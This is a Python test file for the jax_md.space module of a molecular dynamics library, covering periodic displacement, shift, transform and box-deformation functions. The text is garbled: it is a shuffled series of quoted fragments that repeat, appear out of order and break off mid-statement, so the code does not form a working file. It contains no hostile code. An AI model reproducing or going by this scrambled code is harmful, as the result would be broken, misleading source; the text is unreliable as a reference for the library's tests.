1e-13 if dtype is", "s(R, grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R))", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension,", "= random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES): key,", "spatial_dimension, dtype, box_format) R_new = s(R, grad(E)(R)) R_gf_new = s_gf(R_f,", "split1, split2 = random.split(key, 3) R = random.uniform( split1, (PARTICLE_COUNT,", "10 SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2, 3] BOX_FORMATS =", "general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn)", "key, split_t, split_R, split_dR = random.split(key, 4) size_0 = 10.0", "R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) #", "random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn = space.periodic(box_size) general_disp_fn,", "for box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype, box_format): N", "for _ in range(STOCHASTIC_SAMPLES): key, split1, split2, split3 = random.split(key,", "BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "= random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = random.normal( split_dR,", "= R displacement, shift = space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T,", "R.dtype assert jnp.all(R_shift < 1.0) assert jnp.all(R_shift > 0.0) dR_after", "Apache License, Version 2.0 (the \"License\"); # you may not", "BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "either express or implied. # See the License for the", "* random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.where(dR >", "License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "spatial_dimension, dtype, box_format): if box_format == 'scalar': raise SkipTest('Scalar case", "k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape +", "for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key =", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_shift(self,", "grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype } for dim", "spatial_dimension, dtype, box_format) @grad def box_energy_g_fn(box): return E_g(R, new_box=box) @grad", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension,", "3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2, (spatial_dimension,", "dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype", "self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( {", "spatial_dimension)) T_0 = jnp.array(size_0 * (eye + dtransform_0), dtype=dtype) size_1", "= space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled),", "space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype", "tol = 2e-5 for _ in range(STOCHASTIC_SAMPLES): key, split_R, split_T", "= shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0),", "key, split1, split2 = random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT,", "the License. \"\"\"Tests for jax_md.space.\"\"\" from absl.testing import absltest from", "general_disp_fn = space.map_product(general_disp_fn) grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R) **", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad def", "POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol =", "spatial_dimension), dtype=dtype) dR = random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(", "= 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2, 3] BOX_FORMATS", "jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime)", "= space.transform(T, R) energy_direct = lambda R: jnp.sum(R ** 2)", "shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "dtype(box_size) if box_format == 'vector': box = jnp.array(jnp.ones(dim) * box_size,", "== R.dtype assert jnp.all(R_shift < 1.0) assert jnp.all(R_shift > 0.0)", "spatial_dimension), dtype=dtype) R_scaled = R * box_size dR = random.normal(", "E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R, box,", "test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for", "= random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "2) energy_indirect = lambda T, R: jnp.sum(space.transform(T, R) ** 2)", "4) size_0 = 10.0 * random.uniform(split_T0_scale, ()) dtransform_0 = 0.5", "jnp.sum(R ** 2) energy_indirect = lambda T, R: jnp.sum(space.transform(T, R)", "test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES):", "jax_md.space.\"\"\" from absl.testing import absltest from absl.testing import parameterized from", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension,", "dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct = dR dr_direct = space.distance(dR)", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype, box_format):", "space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "= space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1)", "R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "spatial_dimension == 3: for i in range(-1, 2): for j", "test_periodic_general_force(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "# pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( {", "= space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct = dR", "** 2) energy_indirect = lambda T, R: jnp.sum(space.transform(T, R) **", "for _ in range(STOCHASTIC_SAMPLES): key, split_R, split_T = random.split(key, 3)", "dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "new_box=box) @grad def box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box)) if", "@parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype }", "= space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "** 2) grad_direct = grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T, R)", "jax import test_util as jtu from jax_md import space, test_util,", "= random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T =", "= jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct,", "spatial_dimension), dtype=dtype) R = shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR)", "disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn = grad(lambda R:", "= random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R,", "= random.split(key, 3) key, split_T1_scale, split_T1_dT = random.split(key, 3) key,", "* random.uniform(split_T0_scale, ()) dtransform_0 = 0.5 * random.normal( split_T0_dT, (spatial_dimension,", "== dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "+ (1,)) dR_direct = jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct)", "if box_format == 'vector': box = jnp.array(jnp.ones(dim) * box_size, dtype)", "in range(-1, 2): for j in range(-1, 2): for k", "use this file except in compliance with the License. #", "dim), dtype=dtype) R = space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d)) E_gf", "= space.map_product(metric) test_metric = space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES): key,", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension,", "new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( {", "class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled,", "R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "(jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "T = eye + dT + jnp.transpose(dT) R = random.uniform(", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform(self,", "= random.PRNGKey(0) R_f = random.uniform(key, (N, dim), dtype=dtype) R =", "split3 = random.split(key, 4) max_box_size = f32(10.0) box_size = max_box_size", "in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key = random.PRNGKey(0) displacement,", "split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test = space.transform(T_inv,", "spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime =", "2): for j in range(-1, 2): for k in range(-1,", "spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "'spatial_dimension': dim } for dim in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension):", "dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "dtype, box_format): assert box_format in BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0,", "box_format == 'matrix': box = jnp.array(jnp.eye(dim) * box_size, dtype) d,", "disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn =", "R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list(", "def test_periodic_shift(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in", "R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "R) energy_direct = lambda R: jnp.sum(R ** 2) energy_indirect =", "test_util as jtu from jax_md import space, test_util, quantity, energy", "in compliance with the License. # You may obtain a", "16 R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g)", "in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N = 16", "space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R)", "software # distributed under the License is distributed on an", "random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test =", "eye + dT + jnp.transpose(dT) R = random.uniform( split_R, (PARTICLE_COUNT,", "dtype, 'box_format': box_format } for dim in SPATIAL_DIMENSION for dtype", "dR), general_shift_fn(R, dR) * box_size) assert shift_fn(R_scaled, dR).dtype == dtype", "split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.where(dR > 0.49, f32(0.49),", "jnp.where(dR > 0.49, f32(0.49), dR) dR = jnp.where(dR < -0.49,", "(eye + dtransform_0), dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale, (),", "for box_format in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N", "= f32(10.0) box_size = max_box_size * random.uniform( split1, (spatial_dimension,), dtype=dtype)", "dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 =", "R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R", "= space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0) R_f = random.uniform(key, (N,", "dr_direct = jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct =", "BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "general_shift_fn(R, dR) * box_size) assert shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list(", "dtype=dtype) disp_fn, shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn", "# # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format):", "for j in range(-1, 2): for k in range(-1, 2):", "self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "_ in range(STOCHASTIC_SAMPLES): key, split1, split2, split3 = random.split(key, 4)", "dtype, } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))", "deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list(", "for i in range(-1, 2): for j in range(-1, 2):", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn =", "def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key = random.PRNGKey(0) displacement, _ =", "jnp.diag(box_size) R = random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled =", "for box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if", "R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R,", "10.0 * random.uniform(split_T0_scale, ()) dtransform_0 = 0.5 * random.normal( split_T0_dT,", "= quantity.box_size_at_number_density(N, 1.0, dim) box = dtype(box_size) if box_format ==", "dtype=dtype) R0 = R unwrapped_R = R displacement, shift =", "with the License. # You may obtain a copy of", "import random import jax.numpy as jnp from jax import grad,", "elif box_format == 'matrix': box = jnp.array(jnp.eye(dim) * box_size, dtype)", "random.split(key) dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R =", "self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size)", "1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "LLC # # Licensed under the Apache License, Version 2.0", "partial from unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS", "jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted", "grad(lambda R: jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn = grad(lambda R:", "* from functools import partial from unittest import SkipTest test_util.update_test_tolerance(5e-5,", "R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list(", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f))", "in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol", "jit, jacfwd from jax import test_util as jtu from jax_md", "box_size = max_box_size * random.uniform( split1, (spatial_dimension,), dtype=dtype) transform =", "in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0) for", "SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT =", "partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R =", "jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype))", "SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0) for _ in", "s = space.periodic(jnp.diag(box) if box_format == 'matrix' else box) d_gf,", "express or implied. # See the License for the specific", "'spatial_dimension': dim, 'dtype': dtype } for dim in SPATIAL_DIMENSION for", "= jnp.reshape(dr_direct, dr_direct.shape + (1,)) if spatial_dimension == 2: for", "except in compliance with the License. # You may obtain", "dR = jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR", "dtype, box_format) @grad def box_energy_g_fn(box): return E_g(R, new_box=box) @grad def", "= random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn, shift_fn = space.periodic(box_size)", "space.map_product(general_disp_fn) grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R) ** 2)) general_grad_fn", "0) and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "# Licensed under the Apache License, Version 2.0 (the \"License\");", "dR_shifted = dR + jnp.array([i, j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted)", "dtype=dtype) T_1 = jnp.array(size_1 * (eye + dtransform_1), dtype=dtype) disp_fn,", "box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype, box_format): N =", "= 0.5 * random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 =", "R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "= space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list(", "* (eye + dtransform_0), dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale,", "range(STOCHASTIC_SAMPLES): key, split_R, split_T = random.split(key, 3) dT = random.normal(", "CONDITIONS OF ANY KIND, either express or implied. # See", "box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "parameterized from jax.config import config as jax_config from jax import", "random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key,", "dim, 'dtype': dtype, 'box_format': box_format } for dim in SPATIAL_DIMENSION", "self, spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype)", "R: jnp.sum(R ** 2) energy_indirect = lambda T, R: jnp.sum(space.transform(T,", "for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_force(self,", "j in range(-1, 2): dR_shifted = dR + jnp.array([i, j],", "if box_format == 'scalar': raise SkipTest('Scalar case fails due to", "# pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "[f32, f64] else: POSITION_DTYPE = [f32] def make_periodic_general_test_system(N, dim, dtype,", "(PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T,", "R_g_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "R_shift - R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list(", "test_transform_inverse(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13 if", "R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime = space.transform(T, R)", "assert box_format in BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0, dim) box", "E), (s_gf, E_gf), (s_g, E_g) # pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase):", "jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted < dr_direct,", "grad_direct = grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect)", "E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new", "test_metric = space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric = space.map_product(test_metric) for", "if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64] else: POSITION_DTYPE = [f32]", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0),", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new =", "def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format): if box_format == 'scalar': raise", "+ (1,)) if spatial_dimension == 2: for i in range(-1,", "= jnp.where(dR < -0.49, f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0), R,", "f32(10.0) box_size = max_box_size * random.uniform( split1, (spatial_dimension,), dtype=dtype) transform", "self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R, dR, box=T_1),", "POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key = random.PRNGKey(0) eye", "jax import random import jax.numpy as jnp from jax import", "test_periodic_against_periodic_general(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13 if", "License. \"\"\"Tests for jax_md.space.\"\"\" from absl.testing import absltest from absl.testing", "2e-5 for _ in range(STOCHASTIC_SAMPLES): key, split_R, split_T = random.split(key,", "= random.split(key) R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR", "random.split(key, 3) R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR", "energy_indirect = lambda T, R: jnp.sum(space.transform(T, R) ** 2) grad_direct", "random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2,", "space.periodic_displacement(f32(1.0), R_shift - R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR)", "dR_direct = dR dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape", "test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key = random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension))", "= space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for _ in range(SHIFT_STEPS):", "= grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension,", "jax_md.util import * from functools import partial from unittest import", "dtransform_1), dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1)", "E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad", "random.split(key, 3) key, split_t, split_R, split_dR = random.split(key, 4) size_0", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) R = shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R,", "random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list(", "range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3) R = random.normal(split1,", "dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R >", "'box_format': box_format } for dim in SPATIAL_DIMENSION for dtype in", "in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol", "displacement = space.map_product(displacement) for _ in range(SHIFT_STEPS): key, split =", "for box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N", "STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2, 3]", "s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim,", "= space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2 =", "jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R, box, (s, E),", "split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 * (eye +", "dtype=dtype) dR = random.normal( split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R,", "jtu from jax_md import space, test_util, quantity, energy from jax_md.util", "SHIFT_STEPS = 10 SPATIAL_DIMENSION = [2, 3] BOX_FORMATS = ['scalar',", "\"\"\"Tests for jax_md.space.\"\"\" from absl.testing import absltest from absl.testing import", "dtype } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))", "key, split_T0_scale, split_T0_dT = random.split(key, 3) key, split_T1_scale, split_T1_dT =", "spatial_dimension), dtype=dtype) dR = jnp.where(dR > 0.49, f32(0.49), dR) dR", "= random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T,", "== 'vector': box = jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format", "{ 'testcase_name': 